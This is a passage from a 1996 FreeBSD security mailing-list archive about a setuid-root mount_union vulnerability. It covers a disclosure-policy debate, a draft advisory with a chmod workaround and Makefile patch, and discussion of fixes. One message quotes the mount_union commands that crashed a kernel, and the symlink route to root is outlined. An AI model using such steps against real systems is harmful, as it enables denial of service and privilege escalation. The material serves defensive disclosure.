In-Reply-To: <13642.832322039@time.cdrom.com> References: <13642.832322039@time.cdrom.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk < said: >> Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( > Ah well, what's done is done. >> of such an address. The prepared fix is chmod u-s /sbin/mount_union. > It should at least return EPERM! :-) No. Users are /supposed/ to be able to use mount(2) now, if they have appropriate permissions on the source and target. This appears to be a hole in vfsload(3), which I will fix ASAP, if someone doesn't get to it before I do. -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. - Claude McKenzie + Florent Vollant From owner-freebsd-security Fri May 17 09:30:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA29267 for security-outgoing; Fri, 17 May 1996 09:30:24 -0700 (PDT) Received: from mail6 (root@mail6.netcom.com [192.100.81.142]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id JAA29262; Fri, 17 May 1996 09:30:22 -0700 (PDT) Received: from boris.scccc.com ([198.243.16.202]) by mail6 (8.6.13/Netcom) id JAA03734; Fri, 17 May 1996 09:30:17 -0700 Received: by boris.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA10791; Fri, 17 May 1996 10:26:17 -0600 Received: from natasha.scccc.com(198.243.16.198) by boris.scccc.com via smap (V1.3) id sma010789; Fri May 17 10:25:56 1996 Received: by natasha.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA15759; Fri, 17 May 1996 10:16:36 -0600 From: kduling@natasha.scccc.com (Kevin J. Duling) Message-Id: <199605171616.KAA15759@natasha.scccc.com> Subject: Re: very bad To: owner-freebsd-security@freefall.freebsd.org (Glen Foster) Date: Fri, 17 May 1996 10:16:36 -0600 (MDT) Cc: jkh@time.cdrom.com, coredump@nervosa.com, freebsd-security@freebsd.org In-Reply-To: <199605171100.HAA00301@ptavv.nsta.org> from "Glen Foster" at May 17, 96 07:00:35 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > I, for one, am very happy that he announced it to the group rather > than attempting STO. I was able fix the systems for which I have > responsibility immediately. Thanks to Chris for getting the word out! > --- > Glen Foster I agree. I once had a talk with Chris McDonald from WSMR about system security and the debate about whether or not to protect your system through ignorance or not. I was a student at NMSU at the time, working on a paper for system security on NMSU-NET. My audience was my instructor who was also my manager at the Computer Center. Wow, did that stir up a hornets nest, but that's another story... If you don't announce the bugs, then the crackers learn them while the admins are left in ignorance. You're not going to find a forum where you know you're only telling "the right people" about the problem. Now I'm wondering about how many others are out there that I don't know about because they weren't posted on the lists I read. Who's Chris McDonald? One of the few people who listened to Cliff Stoll. -- Kevin J. Duling /\/^\^/^\^\/\ SCC Communications Corp. kduling@scc911.com Boulder, Colorado (303) 581-5769 From owner-freebsd-security Fri May 17 09:35:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA29528 for security-outgoing; Fri, 17 May 1996 09:35:13 -0700 (PDT) Received: from mail6 (root@mail6.netcom.com [192.100.81.142]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id JAA29519; Fri, 17 May 1996 09:35:10 -0700 (PDT) Received: from boris.scccc.com ([198.243.16.202]) by mail6 (8.6.13/Netcom) id JAA05795; Fri, 17 May 1996 09:35:08 -0700 Received: by boris.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA10797; Fri, 17 May 1996 10:31:18 -0600 Received: from natasha.scccc.com(198.243.16.198) by boris.scccc.com via smap (V1.3) id sma010795; Fri May 17 10:31:16 1996 Received: by natasha.scccc.com (940816.SGI.8.6.9/940406.SGI) id KAA15772; Fri, 17 May 1996 10:21:57 -0600 From: kduling@natasha.scccc.com (Kevin J. Duling) Message-Id: <199605171621.KAA15772@natasha.scccc.com> Subject: Re: very bad To: owner-freebsd-security@freefall.freebsd.org (Vladimir Jojic) Date: Fri, 17 May 1996 10:21:57 -0600 (MDT) Cc: freebsd-security@freebsd.org In-Reply-To: <199605171009.MAA00475@EUnet.yu> from "Vladimir Jojic" at May 17, 96 12:09:30 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Hi, > > What IS very bad about this whole thing, isn't existance of this bug, > as much as how easliy information about it can be obtained. Even if > you do send patch along with info, there is still danger that someone, > gets up earlier than root, and then ... (sweat dreams, root!) What might be a better solution is to announce that "There is a problem" then provide the fix...but don't illustrate the problem. That way everyone is immediately notified of the problem and a fix for it, but you don't have a list of instructions for how to crack in. Personally, I prefer having the instructions, but it's not a good idea... -- Kevin J. Duling /\/^\^/^\^\/\ SCC Communications Corp. kduling@scc911.com Boulder, Colorado (303) 581-5769 From owner-freebsd-security Fri May 17 09:53:52 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id JAA01379 for security-outgoing; Fri, 17 May 1996 09:53:52 -0700 (PDT) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id JAA01371 for ; Fri, 17 May 1996 09:53:49 -0700 (PDT) Received: from onyx.nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.5/8.7.3) with SMTP id JAA23977; Fri, 17 May 1996 09:52:27 -0700 (PDT) Date: Fri, 17 May 1996 09:52:26 -0700 (PDT) From: invalid opcode To: Danny Smith cc: Vladimir Jojic , freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605171217.WAA11280@amethyst.auscert.org.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Danny Smith wrote: > Another unfortunate part is that it is approaching midnight in Australia > (and it is now past midnight in New Zealand) at the start of the weekend. > Posting vulnerbility information like this has not helped any system > administrators if they are all home for the weekend. All it has done > is increase the exposure of their systems to attack by more poeple. > > I personally don't think that is helping anyone at all. > > Danny Smith. First off, I wouldn't have posted it had it been a secret little bug. But it wasn't, it was already out on 2 mailing lists which probably have close to 10,000 people on them, 50% of which are people who LOOK for these types of bugs so they can login to their accounts running FreeBSD and exploit it. At this point, the more exposure it gets, the more root@vulnerablehost will hear about it and fix it. == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == From owner-freebsd-security Fri May 17 10:28:31 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA04289 for security-outgoing; Fri, 17 May 1996 10:28:31 -0700 (PDT) Received: from marble.eps.nagoya-u.ac.jp (marble.eps.nagoya-u.ac.jp [133.6.57.68]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA04282 for ; Fri, 17 May 1996 10:28:28 -0700 (PDT) Received: from marble.eps.nagoya-u.ac.jp (localhost [127.0.0.1]) by marble.eps.nagoya-u.ac.jp (8.7.4+2.6Wbeta6/3.3W9) with ESMTP id CAA02155; Sat, 18 May 1996 02:28:18 +0900 (JST) Message-Id: <199605171728.CAA02155@marble.eps.nagoya-u.ac.jp> To: coredump@nervosa.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: BoS: SECURITY BUG in FreeBSD (fwd) In-Reply-To: Your message of "Fri, 17 May 1996 00:47:31 -0700 (PDT)" References: X-Mailer: Mew version 1.05+ on Emacs 19.28.1, Mule 2.3 X-PGP-Fingerprint: CA 87 00 60 BB BA 0C 81 A8 FB AA 6A 3A B0 38 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Sat, 18 May 1996 02:28:16 +0900 From: KATO Takenori Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > mount_union ~/a ~/b > mount_union -b ~/a ~/b My FreeBSD-current (I supped sources on May 17.) box crashed just after `mount_union -b ~/a ~/b' operation. Stack trace shows: _ufs_ihashget: recursive lock not expected -- pid 188 <--- mount_union _ufs_ihashget _ffs_vget _ufs_lookup _lookup ---- KATO Takenori Dept. Earth Planet. Sci., Nagoya Univ., Nagoya, 464-01, Japan Voice: +81-52-789-2529 Fax: +81-52-789-3033 From owner-freebsd-security Fri May 17 10:50:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA05883 for security-outgoing; Fri, 17 May 1996 10:50:58 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA05878; Fri, 17 May 1996 10:50:55 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id KAA00487; Fri, 17 May 1996 10:49:43 -0700 (PDT) Message-Id: <199605171749.KAA00487@precipice.shockwave.com> To: "Jordan K. Hubbard" cc: davidg@Root.COM, "Jordan K. Hubbard" , committers@freefall.freebsd.org, security@freebsd.org Subject: Re: cvs commit: src/sbin Makefile In-reply-to: Your message of "Fri, 17 May 1996 02:38:19 PDT." <273.832325899@time.cdrom.com> Date: Fri, 17 May 1996 10:49:43 -0700 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk From: "Jordan K. Hubbard" Subject: Re: cvs commit: src/sbin Makefile > It would have been better to install it without suid root so that the > permissions get changed when people next do a "make world". Yeah, I thought of that but sort of wimped and decided to go instead for minimum impact (i.e. no changes to mount_union itself). Can we see what pst's final decision on this one is and simply recommend a `chmod u-s /sbin/mount_union' for the time being? Jordan I don't have a "final" decision, but I'm leaning towards making it not setuid root until we're clear that the distributions have all been fixed. Also, I'm open for suggestions on the final outcome here. Ideally, we should simply fix the problem in the code (thank you Garret), not the symptom. However, this is a reasonable workaround given the relatively small use of mount_union, but it is *just* a workaround. Here's my current *DRAFT* advisory, I'm certain it's not perfect (i.e. is 2.0.5 and 2.0 affected too?) Please (anyone who's reading this) proof it... I haven't had a chance to dig through old code myself on this one yet, so I know I probably fubard something, and I definitely want to check to see if NetBSD has this bug too (in a different form) so we can warn them. ------- DRAFT ---- DO NOT REDISTRIBUTE DISTRIBUTE FreeBSD SA-96:09 mount_union unauthorized super-user access Category: core Module: mount_union Announced: 1996-05-17 Affects: FreeBSD 2.1, 2.1-stable, and 2.2-current Corrected: 1996-05-17 2.1-stable and 2.2-current sources Source: 4.4 BSD bug FreeBSD only: unknown Super-user access may be obtained or the system may be crashed through the misuse of the mount_union command. --Workaround-- Mount_union is distributed as a setuid root program. Remove the setuid bit. As root, execute the command: % chmod u-s /sbin/mount_union then verify that the permissions of mount_union have been removed. The permissions array should read "-r-xr-xr-x" as shown here: % ls -l /sbin/mount_union -r-xr-xr-x 1 root bin 53248 Apr 26 04:40 /sbin/mount_union If you have the source code installed, we suggest patching the sources so that mount_union will not be installed with the setuid bit set: You may apply the following patch: *** /usr/src/sbin/mount_union/Makefile Sun Nov 20 14:47:52 1994 --- /usr/src/sbin/mount_union/Makefile Fri May 17 10:36:09 1996 *************** *** 8,14 **** CFLAGS+= -I${.CURDIR}/../../sys -I${MOUNT} .PATH: ${MOUNT} - BINOWN= root - BINMODE=4555 - .include --- 8,11 ---- From owner-freebsd-security Fri May 17 10:58:15 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA06203 for security-outgoing; Fri, 17 May 1996 10:58:15 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id KAA06196 for ; Fri, 17 May 1996 10:58:12 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id KAA00746; Fri, 17 May 1996 10:55:58 -0700 (PDT) Message-Id: <199605171755.KAA00746@precipice.shockwave.com> To: Vladimir Jojic cc: freebsd-security@freebsd.org Subject: Re: very bad In-reply-to: Your message of "Fri, 17 May 1996 12:09:30 +0200." <199605171009.MAA00475@EUnet.yu> Date: Fri, 17 May 1996 10:55:58 -0700 From: Paul Traina Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk We've talked about stuff like this in the past in other forums (not FreeBSD specific) and the conclusion time and time again is that it's so totally trivial to spoof this sort of thing that the only way to handle security issues is full disclosure. FIRST, an organization of CERT-like groups, where everyone ostensibly knows everyone else, leaks information like mad. Given the time and trouble they went through to avoid this, a perl script isn't going to cut it. :-( If there's something sensitive that should be confidential, it should be sent to "security-officer@freebsd.org" who can then pull in the right resources. We'll go for full disclosure as soon as we can verify and patch around the problem, so that EVERYONE gets an even shot at fixing it. Paul From: Vladimir Jojic Subject: Re: very bad Hi, What IS very bad about this whole thing, isn't existance of this bug, as much as how easliy information about it can be obtained. Even if you do send patch along with info, there is still danger that someone, gets up earlier than root, and then ... (sweat dreams, root!) I am not very familiar with mailing list programs, but there is posible improvment (if it isn't yet done): - add special class of mailing list, such as security list - when user wants to be added to this list, program checks if his root (of system from which mail came) is on the list: 1. yes, inform root (or address he left), about that user (even ask if he allows him to join this list, this is a bit fascist, but that's security) 2. not, inform root about existence of this list ask him if he wants to join (where to send him mail, how much to *delay* info on bugs to users on his system, or not even allow them to join (hey, maybe system is crackers nest)) if not, ask him should the user be allowed to join list I believe that it is obvious why *delay* is so important. This is just the sketch, of course. Maybe this message isn't for this list, but it certainly concerns, all of the readers. I admit that *delay* is a bit strong, but so are the closed list. There is still one problem, if we have a roOT od small system not connected to Internet, he can receive mail only on other system, that is connected. ROot of system connected to Internet, receives info before roOT of small system, and if has any malicious intention, he can surely, mess things up. But that comes to domain of human nature. I am not saying that this will solve all problems, but will *delay* some. Please, give your opinions on this, Vladimir Jojic (guru apprentice, still looking for teacher ... :) vjojic@EUnet.yu > > On Fri, 17 May 1996, Jordan K. Hubbard wrote: > > > Ow! :-( > > > > Thanks for reporting this! > > > > You know though, for ones this bad I'd really rather you sent the > > message to security-officer@freebsd.org rather than freebsd-security > > in the future. There are easily over 1000 people on this list and you > > just announced a cookbook method for any shell account user to go root > > on a FreeBSD based ISP box; hardly the kind of information one would > > want to see widely circulated without a prepared fix, at the > > least. :-( > > Jordan > > Too bad it's already on BUGTRAQ and BoS which is way more than 1000 :-( > And I would have sent it to security-officer@freebsd.org had I even known > of such an address. The prepared fix is chmod u-s /sbin/mount_union. > > == Chris Layne ======================================== Nervosa Computing = >>= > == coredump@nervosa.com ================ http://www.nervosa.com/~coredump = >>= > > From owner-freebsd-security Fri May 17 11:21:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07426 for security-outgoing; Fri, 17 May 1996 11:21:58 -0700 (PDT) Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA07418 for ; Fri, 17 May 1996 11:21:55 -0700 (PDT) Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA05895; Fri, 17 May 1996 14:21:48 -0400 Date: Fri, 17 May 1996 14:21:48 -0400 From: Garrett Wollman Message-Id: <9605171821.AA05895@halloran-eldar.lcs.mit.edu> To: Paul Traina Cc: "Jordan K. Hubbard" , davidg@root.com, "Jordan K. Hubbard" , committers@freefall.freebsd.org, security@freebsd.org Subject: Re: cvs commit: src/sbin Makefile In-Reply-To: <199605171749.KAA00487@precipice.shockwave.com> References: <273.832325899@time.cdrom.com> <199605171749.KAA00487@precipice.shockwave.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk < said: > Here's my current *DRAFT* advisory, I'm certain it's not perfect > (i.e. is 2.0.5 and 2.0 affected too?) Yes. This bug has been in there since the 2.0. The fix should be the same for all release versions of libc (make a diff with -kk so that the different RCS Ids don't cause the patch to partially fail). > I definitely want to check to see if NetBSD has this bug too (in > a different form) so we can warn them. I'd be very surprised. > FreeBSD SA-96:09 mount_union unauthorized super-user access mount_msdos is also affected. All of the mount_* programs can be affected if `root' has an insecure path and attempts to mount a filesystem type not already in the kernel. > Category: core > Module: mount_union > Announced: 1996-05-17 > Affects: FreeBSD 2.1, 2.1-stable, and 2.2-current > Corrected: 1996-05-17 2.1-stable and 2.2-current sources Not yet in -stable. Doing that right now. > Source: 4.4 BSD bug No. 4.4 didn't have LKMs. > FreeBSD only: unknown Yes. -GAWollman -- Garrett A. Wollman | Shashish is simple, it's discreet, it's brief. ... wollman@lcs.mit.edu | Shashish is the bonding of hearts in spite of distance. Opinions not those of| It is a bond more powerful than absence. We like people MIT, LCS, ANA, or NSA| who like Shashish. - Claude McKenzie + Florent Vollant From owner-freebsd-security Fri May 17 11:22:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07469 for security-outgoing; Fri, 17 May 1996 11:22:27 -0700 (PDT) Received: (from hsu@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07463; Fri, 17 May 1996 11:22:26 -0700 (PDT) Date: Fri, 17 May 1996 11:22:26 -0700 (PDT) From: Jeffrey Hsu Message-Id: <199605171822.LAA07463@freefall.freebsd.org> To: jkh Subject: Re: very bad Cc: freebsd-security Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk I believe mount_union is setuid root to allow non-root users to make union mounts in directories that they own. The Lite2 kernel (a current snapshot of my diffs is in ~hsu/cvs/teeny.diffs.5-16.gz) removes the restriction that only root can do mounts, so mount_union is no longer set_uid there. So, it should be sufficient to just make our mount_union non-setuid root for the following reasons: 1. Union mounts don't work anyways. 2. When they do work in Lite2, mount_union won't be setuid root. 3. If the user want to try out union mounts now, he can su and do it. From owner-freebsd-security Fri May 17 11:24:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA07580 for security-outgoing; Fri, 17 May 1996 11:24:04 -0700 (PDT) Received: from spike.palmer.com (spike.palmer.com [198.3.156.44]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA07520 for ; Fri, 17 May 1996 11:23:53 -0700 (PDT) Message-Id: <199605171823.LAA07520@freefall.freebsd.org> Received: by spike.palmer.com (1.37.109.11/16.2) id AA035917417; Fri, 17 May 1996 13:23:37 -0500 Date: Fri, 17 May 1996 13:23:37 -0500 From: Richard Palmer To: security@freebsd.org Subject: Subscribe rdp@palmer.com Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk subscribe rdp@palmer.com From owner-freebsd-security Fri May 17 11:44:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA08719 for security-outgoing; Fri, 17 May 1996 11:44:59 -0700 (PDT) Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA08712 for ; Fri, 17 May 1996 11:44:56 -0700 (PDT) Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id SAA09686; Fri, 17 May 1996 18:44:14 GMT Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma009674; Fri May 17 18:43:43 1996 Received: (from mrm@localhost) by meerkat.mole.org (8.6.12/8.6.9) id LAA02710; Fri, 17 May 1996 11:43:43 -0700 Date: Fri, 17 May 1996 11:43:43 -0700 From: "M.R.Murphy" Message-Id: <199605171843.LAA02710@meerkat.mole.org> To: kduling@natasha.scccc.com Subject: Re: very bad Cc: freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Personally, I prefer having the instructions, but it's not a good idea... Me too. I hate the STO argument thread, and to avoid it, might it not be a Good Thing to do a security sweep of the system, say look at all suid/sgid, IFS holes, and all exec* with no absolute path that are lurking. vfsload probably isn't the only one. ;-) -- Mike Murphy mrm@Mole.ORG +1 619 598 5874 Better is the enemy of Good From owner-freebsd-security Fri May 17 11:48:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA08990 for security-outgoing; Fri, 17 May 1996 11:48:13 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA08985 for ; Fri, 17 May 1996 11:48:11 -0700 (PDT) Received: (from scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) id OAA03556; Fri, 17 May 1996 14:46:28 -0400 (EDT) Date: Fri, 17 May 1996 14:46:28 -0400 (EDT) From: Scanner SOD To: Vladimir Jojic cc: freebsd-security@freebsd.org Subject: Re: very bad In-Reply-To: <199605171009.MAA00475@EUnet.yu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Fri, 17 May 1996, Vladimir Jojic wrote: > > Hi, > > What IS very bad about this whole thing, isn't existance of this bug, > as much as how easliy information about it can be obtained. Even if > you do send patch along with info, there is still danger that someone, > gets up earlier than root, and then ... (sweat dreams, root!) > > I am not very familiar with mailing list programs, but there is posible > improvment (if it isn't yet done): > > - add special class of mailing list, such as security list > > - when user wants to be added to this list, program checks > if his root (of system from which mail came) is on the > list: > 1. yes, inform root (or address he left), about > that user (even ask if he allows him to join > this list, this is a bit fascist, but that's > security) > 2. not, inform root about existence of this list > ask him if he wants to join (where to send him > mail, how much to *delay* info on bugs to users > on his system, or not even allow them to join > (hey, maybe system is crackers nest)) > if not, ask him should the user be allowed to > join list I have to agree. Myself and others on the FreeBSD Net. (http://www.bsdnet.org) Have recently become very concerned about the policies of the propogation and lack thereof, of security information on FreeBSD. Im not blaming anyone I acknowledge just how many hours there are in a day for the everyone. But we fear that as FreeBSD becomes a more appealing route to take for a lot of ISP's, companies, etc.. That we are going to wind up taking the same policies. See no evil hear no evil. I have complete faith that BSD is one of the most secure unicies out there, But when a "feature" :) like the mount_union pops up it makes one wonder what is wrong with that picture. I would like to volunteer to help out in any way to see that something along the lines of vladimir's suggestions are carried out. I think we need a fast, safe way to bring admins the information that is critical. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net ===================================| SysAdmin / Network Engineer / Consultant From owner-freebsd-security Fri May 17 12:27:02 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA11653 for security-outgoing; Fri, 17 May 1996 12:27:02 -0700 (PDT) Received: from fslg8.fsl.noaa.gov (fslg8.fsl.noaa.gov [137.75.131.171]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA11648 for ; Fri, 17 May 1996 12:27:01 -0700 (PDT) Received: by fslg8.fsl.noaa.gov (5.57/Ultrix3.0-C) id AA06787; Fri, 17 May 96 19:26:24 GMT Message-Id: <9605171926.AA06787@fslg8.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.3/16.2) id AA228791186; Fri, 17 May 1996 13:26:26 -0600 Date: Fri, 17 May 1996 13:26:26 -0600 From: Sean Kelly To: coredump@nervosa.com Cc: freebsd-security@freebsd.org In-Reply-To: (message from invalid opcode on Fri, 17 May 1996 09:52:26 -0700 (PDT)) Subject: Re: very bad Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Personally, I appreciate your posting of it. I rely on the mailing lists as the best sources for the latest information. Thanks to your posting, I've prevented the problem until a fix to the lower layers of code is implemented. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Fri May 17 12:49:57 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA13305 for security-outgoing; Fri, 17 May 1996 12:49:57 -0700 (PDT) Received: from ptavv.nsta.org (ptavv.gfoster.com [199.0.2.254]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA13286; Fri, 17 May 1996 12:49:46 -0700 (PDT) Received: (from gfoster@localhost) by ptavv.nsta.org (8.7.5/8.6.12) id PAA00619; Fri, 17 May 1996 15:48:25 -0400 (EDT) Date: Fri, 17 May 1996 15:48:25 -0400 (EDT) From: Glen Foster Message-Id: <199605171948.PAA00619@ptavv.nsta.org> To: pst@shockwave.com CC: jkh@time.cdrom.com, davidg@Root.COM, jkh@freefall.freebsd.org, committers@freefall.freebsd.org, security@FreeBSD.org In-reply-to: <199605171749.KAA00487@precipice.shockwave.com> (message from Paul Traina on Fri, 17 May 1996 10:49:43 -0700) Subject: Re: cvs commit: src/sbin Makefile Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk How about rather than changing the Makefile to not install suid, the full path of modload be referenced in the source. Preserves the suid functionality and defeats the symlink attack. --- Glen Foster From owner-freebsd-security Fri May 17 13:24:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA15929 for security-outgoing; Fri, 17 May 1996 13:24:56 -0700 (PDT) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA15920; Fri, 17 May 1996 13:24:51 -0700 (PDT) Received: from shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.5/8.7.3) with ESMTP id NAA01405; Fri, 17 May 1996 13:23:16 -0700 (PDT) Message-Id: <199605172023.NAA01405@precipice.shockwave.com> To: Glen Foster cc: jkh@time.cdrom.com, davidg@Root.COM, jkh@freefall.freebsd.org, committers@freefall.freebsd.org, security@FreeBSD.org Subject: Re: cvs commit: src/sbin Makefile In-reply-to: Your message of "Fri, 17 May 1996 15:48:25 EDT." <199605171948.PAA00619@ptavv.nsta.org> Date: Fri, 17 May 1996 13:23:16 -0700 From: Paul Traina Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk There are two separate problems. One is the crash, which can only be solved via removing setuid (until we fix it), the other is the symlink attack, which has been fixed properly. Two separate security bulletins will be released shortly on this problem to freebsd-security-notifications@freebsd.org. From: Glen Foster Subject: Re: cvs commit: src/sbin Makefile How about rather than changing the Makefile to not install suid, the full path of modload be referenced in the source. Preserves the suid functionality and defeats the symlink attack. --- Glen Foster From owner-freebsd-security Fri May 17 14:51:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id OAA22600 for security-outgoing; Fri, 17 May 1996 14:51:37 -0700 (PDT) Received: from black.gensys.com (black.gensys.com [206.109.98.10]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id OAA22594 for ; Fri, 17 May 1996 14:51:33 -0700 (PDT) Received: (from jhupp@localhost) by black.gensys.com (8.7.5/8.6.12) id QAA11714 for freebsd-security@FreeBSD.org; Fri, 17 May 1996 16:51:28 -0500 (CDT) From: Jeff Hupp Message-Id: <199605172151.QAA11714@black.gensys.com> Subject: Re: very bad To: freebsd-security@FreeBSD.org Date: Fri, 17 May 1996 16:51:27 -0500 (CDT) In-Reply-To: from "Scanner SOD" at May 17, 96 02:46:28 pm X-Mailer: ELM [version 2.4 PL24 ME8a] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Scanner SOD shaped the electrons to the following form: : On Fri, 17 May 1996, Vladimir Jojic wrote: : : > : > Hi, : > : > What IS very bad about this whole thing, isn't existance of this bug, : > as much as how easliy information about it can be obtained. Even if : > you do send patch along with info, there is still danger that someone, : > gets up earlier than root, and then ... (sweat dreams, root!) : > : > I am not very familiar with mailing list programs, but there is posible : > improvment (if it isn't yet done): : > [Suggestions deleted] : I have to agree. Myself and others on the FreeBSD Net. : (http://www.bsdnet.org) Have recently become very concerned about the : policies of the propogation and lack thereof, of security information on : FreeBSD. Im not blaming anyone I acknowledge just how many hours there : are in a day for the everyone. But we fear that as FreeBSD becomes a more : appealing route to take for a lot of ISP's, companies, etc.. That we are : going to wind up taking the same policies. See no evil hear no evil. : : I have complete faith that BSD is one of the most secure unicies out there, : But when a "feature" :) like the mount_union pops up it makes one wonder : what is wrong with that picture. I would like to volunteer to help out in : any way to see that something along the lines of vladimir's suggestions : are carried out. I think we need a fast, safe way to bring admins the : information that is critical. : Security through obscurity does not work. Spreading the word far and wide is the only hope of getting the word in all the right hands. If it gets out at all it will end up in the wrong hand. I was very happy to see this come across my desk as it allowed me to fix the problem as soon as word was out. -- Windows '95 ~ Never has so much done so little for so many. Jeff Hupp PGP Public Key available at http://gensys.com or on the key servers From owner-freebsd-security Fri May 17 15:17:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA23971 for security-outgoing; Fri, 17 May 1996 15:17:06 -0700 (PDT) Received: from sea.campus.luth.se (sea.campus.luth.se [130.240.193.40]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id PAA23965 for ; Fri, 17 May 1996 15:17:04 -0700 (PDT) Received: (from karpen@localhost) by sea.campus.luth.se (8.6.12/8.6.12) id AAA00505 for 